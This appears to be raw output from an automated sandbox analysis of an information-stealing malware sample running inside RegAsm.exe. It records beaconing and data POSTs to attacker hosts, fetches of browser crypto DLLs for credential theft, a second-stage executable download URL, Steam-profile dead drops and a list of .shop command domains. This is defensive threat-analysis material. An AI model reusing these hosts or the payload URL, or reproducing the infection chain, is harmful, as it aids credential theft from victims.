Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKKFHIEGDHJKECAAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 130469Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionmwq.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: chickerkuso.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: achievenmtynwjq.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Connection: Keep-AliveCache-Control: no-cacheHost: cowod.hopto.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: puredoffustow.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: opponnentduei.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: metallygaricwo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: milldymarskwom.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quotamkdsdqo.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: carrtychaintnyw.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5785Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127
Source: unknown	TCP traffic detected without corresponding DNS query: 116.203.165.127

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00406963

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Connection: Keep-AliveCache-Control: no-cacheHost: cowod.hopto.org
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache

Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: om/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketc equals www.youtube.com (Youtube)
Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: tps://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none' equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: questionmwq.shop
Source: global traffic	DNS traffic detected: DNS query: chickerkuso.shop
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org
Source: global traffic	DNS traffic detected: DNS query: achievenmtynwjq.shop
Source: global traffic	DNS traffic detected: DNS query: puredoffustow.shop
Source: global traffic	DNS traffic detected: DNS query: opponnentduei.shop
Source: global traffic	DNS traffic detected: DNS query: metallygaricwo.shop
Source: global traffic	DNS traffic detected: DNS query: milldymarskwom.shop
Source: global traffic	DNS traffic detected: DNS query: quotamkdsdqo.shop
Source: global traffic	DNS traffic detected: DNS query: carrtychaintnyw.shop
Source: global traffic	DNS traffic detected: DNS query: genedjestytw.shop

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGCFCAFIIEBGCBFCAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Content-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: RegAsm.exe, 00000009.00000002.2434993175.00000000012CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1
Source: RegAsm.exe, 00000003.00000002.2383468411.000000000135A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013A0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe
Source: RegAsm.exe, 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe1kkkkn
Source: RegAsm.exe, 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exedata;
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exej$
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.FCAKJJJKJKFI
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.JKJKFI
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: RegAsm.exe, 00000003.00000002.2383468411.00000000013CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: RegAsm.exe, 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgKFI
Source: file.exe, 00000000.00000002.1717289936.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: RegAsm.exe, 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoJJKJKFI
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, BAAEHDBFID.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, file.exe, softokn3.dll.3.dr, 66ecb454d2b4a_lgfdsjgds[1].exe.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: BAAEHDBFID.exe.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000003.00000002.2408971921.000000003E5B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2397277169.00000000267FB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2403379667.00000000326D8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2394139552.000000002088D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
